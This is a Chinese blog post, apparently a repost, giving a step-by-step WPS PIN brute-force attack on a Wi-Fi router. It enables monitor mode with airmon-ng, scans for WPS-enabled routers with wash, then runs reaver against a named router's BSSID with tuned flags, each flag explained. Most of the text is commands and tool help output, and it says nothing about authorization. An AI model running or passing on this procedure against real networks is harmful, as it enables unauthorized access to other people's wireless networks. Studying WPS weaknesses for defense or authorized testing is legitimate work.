天天看點

無線滲透筆記(三)-《窮舉pin碼攻擊》

開啟網卡監聽模式

1

<code>airmon-ng start wlan2</code>

檢視開啟QSS快速連接配接功能的路由器

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

<code>root@kali:~# wash --help</code>

<code>Wash v1.4 WiFi Protected Setup Scan Tool</code>

<code>Copyright (c) 2011, Tactical Network Solutions, Craig Heffner &lt;</code><code>cheffner</code><code>@tacnetsol.com&gt;</code>

<code>Required Arguments:</code>

<code>    </code><code>-i, --interface=&lt;</code><code>iface</code><code>&gt;              Interface to capture packets on</code>

<code>    </code><code>-f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files</code>

<code>Optional Arguments:</code>

<code>    </code><code>-c, --channel=&lt;</code><code>num</code><code>&gt;                  Channel to listen on [auto]</code>

<code>    </code><code>-o, --out-file=&lt;</code><code>file</code><code>&gt;                Write data to file</code>

<code>    </code><code>-n, --probes=&lt;</code><code>num</code><code>&gt;                   Maximum number of probes to send to each AP in scan mode [15]</code>

<code>    </code><code>-D, --daemonize                      Daemonize wash</code>

<code>    </code><code>-C, --ignore-fcs                     Ignore frame checksum errors</code>

<code>    </code><code>-5, --5ghz                           Use 5GHz 802.11 channels</code>

<code>    </code><code>-s, --scan                           Use scan mode</code>

<code>    </code><code>-u, --survey                         Use survey mode [default]</code>

<code>    </code><code>-h, --help                           Show help</code>

<code>Example:</code>

<code>    </code><code>wash -i mon0</code>

使用-C參數,BSSID為AP的MAC,channel是信道,RSSI是信号值,數字部分越小代表信号越強,WPS Locked就是WPS鎖當機制,ESSID是信号名稱

<code>wash -i mon0 -C</code>

標明FAST_D46F76路由器開始攻擊

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

<code>root@kali:~# reaver --help</code>

<code>Reaver v1.4 WiFi Protected Setup Attack Tool</code>

<code>    </code><code>-i, --interface=&lt;</code><code>wlan</code><code>&gt;          Name of the monitor-mode interface to use</code>

<code>    </code><code>-b, --bssid=&lt;</code><code>mac</code><code>&gt;               BSSID of the target AP</code>

<code>    </code><code>-m, --mac=&lt;</code><code>mac</code><code>&gt;                 MAC of the host system</code>

<code>    </code><code>-e, --essid=&lt;</code><code>ssid</code><code>&gt;              ESSID of the target AP</code>

<code>    </code><code>-c, --channel=&lt;</code><code>channel</code><code>&gt;         Set the 802.11 channel for the interface (implies -f)</code>

<code>    </code><code>-o, --out-file=&lt;</code><code>file</code><code>&gt;           Send output to a log file [stdout]</code>

<code>    </code><code>-s, --session=&lt;</code><code>file</code><code>&gt;            Restore a previous session file</code>

<code>    </code><code>-C, --exec=&lt;</code><code>command</code><code>&gt;            Execute the supplied command upon successful pin recovery</code>

<code>    </code><code>-D, --daemonize                 Daemonize reaver</code>

<code>    </code><code>-a, --auto                      Auto detect the best advanced options for the target AP</code>

<code>    </code><code>-f, --fixed                     Disable channel hopping</code>

<code>    </code><code>-5, --5ghz                      Use 5GHz 802.11 channels</code>

<code>    </code><code>-v, --verbose                   Display non-critical warnings (-vv for more)</code>

<code>    </code><code>-q, --quiet                     Only display critical messages</code>

<code>    </code><code>-h, --help                      Show help</code>

<code>Advanced Options:</code>

<code>    </code><code>-p, --pin=&lt;</code><code>wps</code> <code>pin&gt;             Use the specified 4 or 8 digit WPS pin</code>

<code>    </code><code>-d, --delay=&lt;</code><code>seconds</code><code>&gt;           Set the delay between pin attempts [1]</code>

<code>    </code><code>-l, --lock-delay=&lt;</code><code>seconds</code><code>&gt;      Set the time to wait if the AP locks WPS pin attempts [60]</code>

<code>    </code><code>-g, --max-attempts=&lt;</code><code>num</code><code>&gt;        Quit after num pin attempts</code>

<code>    </code><code>-x, --fail-wait=&lt;</code><code>seconds</code><code>&gt;       Set the time to sleep after 10 unexpected failures [0]</code>

<code>    </code><code>-r, --recurring-delay=&lt;</code><code>x:y</code><code>&gt;     Sleep for y seconds every x pin attempts</code>

<code>    </code><code>-t, --timeout=&lt;</code><code>seconds</code><code>&gt;         Set the receive timeout period [5]</code>

<code>    </code><code>-T, --m57-timeout=&lt;</code><code>seconds</code><code>&gt;     Set the M5/M7 timeout period [0.20]</code>

<code>    </code><code>-A, --no-associate              Do not associate with the AP (association must be done by another application)</code>

<code>    </code><code>-N, --no-nacks                  Do not send NACK messages when out of order packets are received</code>

<code>    </code><code>-S, --dh-small                  Use small DH keys to improve crack speed</code>

<code>    </code><code>-L, --ignore-locks              Ignore locked state reported by the target AP</code>

<code>    </code><code>-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet</code>

<code>    </code><code>-n, --nack                      Target AP always sends a NACK [Auto]</code>

<code>    </code><code>-w, --win7                      Mimic a Windows 7 registrar [False]</code>

<code>    </code><code>reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv</code>

使用如下參數

<code>reaver –i mon0 -b 28:2C:B2:D4:6F:76 -a -S -d 3 -t 3 -vv -c 1</code>

-i  網卡的監視接口 

-b  目标AP的MAC位址

-a  自動檢測目标AP最佳配置

-S  使用最小的DH key,可以提高破解速度

-d  即delay,延時 預設為1秒

-t  即timeout,逾時 每次窮舉等待回報的最長時間

-vv  顯示更多的非嚴重警告

-c  指定信道,可以友善找到信号

晚飯吃完回來,希望能夠破解出來:)

本文轉自文東會部落格51CTO部落格,原文連結http://blog.51cto.com/hackerwang/1420938如需轉載請自行聯系原作者

謝文東666

上一篇: MONITOR

繼續閱讀